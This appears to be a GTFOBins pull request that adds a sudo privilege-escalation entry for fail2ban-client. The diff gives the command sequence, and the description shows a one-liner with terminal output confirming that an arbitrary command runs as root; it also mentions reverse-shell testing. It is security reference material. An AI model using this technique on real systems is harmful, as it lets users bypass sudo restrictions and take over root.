### PR TITLE
Add fail2ban-client sudo

### DIFF
--- a/_gtfobins/fail2ban-client.md
+++ b/_gtfobins/fail2ban-client.md
@@ -1,6 +1,6 @@
 ---
 description: |
-  The subprocess is immediately sent to the background, but `fail2ban-client` waits on a return code from the subprocess (it will hang the `banip` command until the subprocess returns.
+  The subprocess is immediately sent to the background, but `fail2ban-client` waits on a return code from the subprocess. The `banip` command will hang until the subprocess returns.
 functions:
   sudo:
     - code: |

--- a/_gtfobins/fail2ban-client.md
+++ b/_gtfobins/fail2ban-client.md
@@ -1,0 +1,15 @@
+---
+description: |
+  The subprocess is immediately sent to the background, but `fail2ban-client` waits on a return code from the subprocess (it will hang the `banip` command until the subprocess returns.
+functions:
+  sudo:
+    - code: |
+        COMMAND="id"
+        sudo fail2ban-client add woot
+        sudo fail2ban-client set woot addaction wootaction
+        sudo fail2ban-client set woot action wootaction actionban "$COMMAND"
+        sudo fail2ban-client start woot
+        sudo fail2ban-client set woot banip 999.999.999.999
+        sudo fail2ban-client set woot unbanip 999.999.999.999
+        sudo fail2ban-client stop woot
+---


### PR DESCRIPTION
I modified the `id` command to `COMMAND="id >> $(tty)"` to test locally and output the context it's running as (as well as tons of `touch /tmp/testfile` and a bash reverse shell tests) to confirm it runs as root and display in the output below

This is condensed into a one-liner as well:
```
they@ubuntu:~$ COMMAND="id >> $(tty)";sudo fail2ban-client add woot;sudo fail2ban-client set woot addaction wootaction;sudo fail2ban-client set woot action wootaction actionban "$COMMAND";sudo fail2ban-client start woot;sudo fail2ban-client set woot banip 999.999.999.999;sudo fail2ban-client set woot unbanip 999.999.999.999;sudo fail2ban-client stop woot
Added jail woot
wootaction
id >> /dev/pts/1
Jail started
uid=0(root) gid=0(root) groups=0(root)
1
1
Jail stopped
they@ubuntu:~$
```

I removed the `$(tty)` section for the actual PoC.

First time contributor so LMK if you need any further changes. Thanks!